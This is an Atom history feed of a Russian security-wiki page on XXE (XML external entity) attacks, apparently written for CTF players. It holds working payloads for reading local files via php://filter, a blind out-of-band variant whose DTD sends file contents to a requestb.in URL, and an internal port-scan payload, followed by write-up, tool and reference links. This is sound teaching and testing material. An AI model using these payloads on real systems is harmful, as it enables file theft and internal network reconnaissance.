<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="ru">
		<id>http://itsecwiki.org/index.php?action=history&amp;feed=atom&amp;title=Xxe</id>
		<title>Xxe - История изменений</title>
		<link rel="self" type="application/atom+xml" href="http://itsecwiki.org/index.php?action=history&amp;feed=atom&amp;title=Xxe"/>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=Xxe&amp;action=history"/>
		<updated>2026-05-18T19:49:28Z</updated>
		<subtitle>История изменений этой страницы в вики</subtitle>
		<generator>MediaWiki 1.27.7</generator>

	<entry>
		<id>http://itsecwiki.org/index.php?title=Xxe&amp;diff=475&amp;oldid=prev</id>
		<title>Drakylar: Новая страница: «  ==Поиск уязвимости==   ==Эксплуатация==   ===Чтение локальных файлов===  Код для чтения лок. фа…»</title>
		<link rel="alternate" type="text/html" href="http://itsecwiki.org/index.php?title=Xxe&amp;diff=475&amp;oldid=prev"/>
				<updated>2016-11-01T21:03:46Z</updated>
		
		<summary type="html">&lt;p&gt;Новая страница: «  ==Поиск уязвимости==   ==Эксплуатация==   ===Чтение локальных файлов===  Код для чтения лок. фа…»&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Новая страница&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
==Поиск уязвимости==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Эксплуатация==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Чтение локальных файлов===&lt;br /&gt;
&lt;br /&gt;
Код для чтения лок. файлов, вывод закодирован в base64:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot; line=&amp;quot;1&amp;quot; enclose=&amp;quot;div&amp;quot; style=&amp;quot;overflow-x:scroll&amp;quot; &amp;gt;&lt;br /&gt;
&amp;lt;?xml version='1.0' standalone='yes'?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE plot [&amp;lt;!ENTITY xxe SYSTEM &amp;quot;php://filter/read=convert.base64-encode/resource=/etc/flag&amp;quot;&amp;gt;]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
В случае со слепой XXE:&lt;br /&gt;
&lt;br /&gt;
Отсылаемый код:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot; line=&amp;quot;1&amp;quot; enclose=&amp;quot;div&amp;quot; style=&amp;quot;overflow-x:scroll&amp;quot; &amp;gt;&lt;br /&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
&amp;lt;!ENTITY % remote SYSTEM &amp;quot;http://site/xxe.dtd&amp;quot;&amp;gt;&lt;br /&gt;
%remote;]&amp;gt;&lt;br /&gt;
&amp;lt;root/&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Хранящийся по URL'у (http://site/xxe.dtd):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot; line=&amp;quot;1&amp;quot; enclose=&amp;quot;div&amp;quot; style=&amp;quot;overflow-x:scroll&amp;quot; &amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % payload SYSTEM &amp;quot;php://filter/read=convert.base64-encode/resource=file:///etc/flag&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % int &amp;quot;&amp;lt;!ENTITY &amp;amp;#37; trick SYSTEM 'http://requestb.in/xxxxxxxx?xxe_local=%payload;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
%int;&lt;br /&gt;
%trick;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Сканирование портов===&lt;br /&gt;
&lt;br /&gt;
Запускать нужно с Intruder'ом или другой утилитой, позволяющей перебирать значение $$ (1-65535):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;javascript&amp;quot; line=&amp;quot;1&amp;quot; enclose=&amp;quot;div&amp;quot; style=&amp;quot;overflow-x:scroll&amp;quot; &amp;gt;&lt;br /&gt;
&amp;lt;?xml version='1.0' standalone='no'?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE plot [&amp;lt;!ENTITY xxe SYSTEM &amp;quot;php://filter/read=convert.base64-encode/resource=http://127.0.0.1:$$&amp;quot;&amp;gt;]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Примеры тасков==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Райтапы==&lt;br /&gt;
&lt;br /&gt;
[http://www.pwntester.com/blog/2014/01/17/hackyou2014-web400-write-up/ hackyou2014-web400-write-up]&lt;br /&gt;
&lt;br /&gt;
[https://gist.github.com/h3xstream/3d51b99f651548f7fa2b GoSecure CTF - Web 300]&lt;br /&gt;
&lt;br /&gt;
[https://darkbyte.ru/2012/48/phdays-hackquest-ctf-writeup/ Belorussky Rail Terminal]&lt;br /&gt;
&lt;br /&gt;
[http://zairo.tistory.com/entry/2016-SECUINSIDE-CTF-Onmyweb400 SECUINSIDE CTF Onmyweb400]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Утилиты==&lt;br /&gt;
&lt;br /&gt;
[https://github.com/BuffaloWill/oxml_xxe oxml_xxe]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/enjoiz/XXEinjector XXEinjector]&lt;br /&gt;
&lt;br /&gt;
[https://github.com/Gifts/XXE-OOB-Exploitation-Toolset-for-Automation/ XXE-OOB]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Полезные ссылки==&lt;br /&gt;
&lt;br /&gt;
[https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing owasp]&lt;br /&gt;
&lt;br /&gt;
[https://andrepetukhov.wordpress.com/2011/01/15/атака-xxe-xml-injectio/ статья от andrepetukhov]&lt;br /&gt;
&lt;br /&gt;
[https://xakep.ru/2012/12/11/xml-apps-attacks-manual/ xakep.ru]&lt;br /&gt;
&lt;br /&gt;
[http://resources.infosecinstitute.com/xxe-attacks/ infosec]&lt;br /&gt;
&lt;br /&gt;
[https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf слепые xxe]&lt;br /&gt;
&lt;br /&gt;
[https://www.christian-schneider.net/GenericXxeDetection.html detection xxe]&lt;/div&gt;</summary>
		<author><name>Drakylar</name></author>	</entry>

	</feed>